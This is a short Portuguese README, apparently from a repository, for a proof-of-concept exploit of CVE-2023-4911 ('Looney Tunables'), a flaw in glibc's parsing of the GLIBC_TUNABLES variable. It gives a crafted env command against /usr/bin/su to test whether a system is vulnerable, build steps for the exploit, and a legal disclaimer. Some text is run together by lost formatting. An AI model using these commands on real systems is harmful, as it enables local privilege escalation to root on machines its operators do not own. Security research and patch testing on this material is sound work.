
Este é um PoC do CVE-2023-4911 (também conhecido como "Looney Tunables") que explora uma falha na função de análise da variável de ambiente GLIBC_TUNABLES do carregador dinâmico glibc, a função parse_tunables().
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help
Segmentation fault (core dumped), então estamos lidando com um alvo vulnerável.libc.so.6python3 libc.py
gcc exp.c -o exp
Todo o código fornecido neste repositório é apenas para fins educacionais/de pesquisa. Quaisquer ações e/ou atividades relacionadas ao material contido neste repositório são de sua exclusiva responsabilidade. O uso indevido do código neste repositório pode resultar em acusações criminais contra as pessoas em questão. O autor não será responsabilizado no caso de quaisquer acusações criminais serem feitas contra qualquer pessoa que faça uso indevido do código neste repositório para infringir a lei.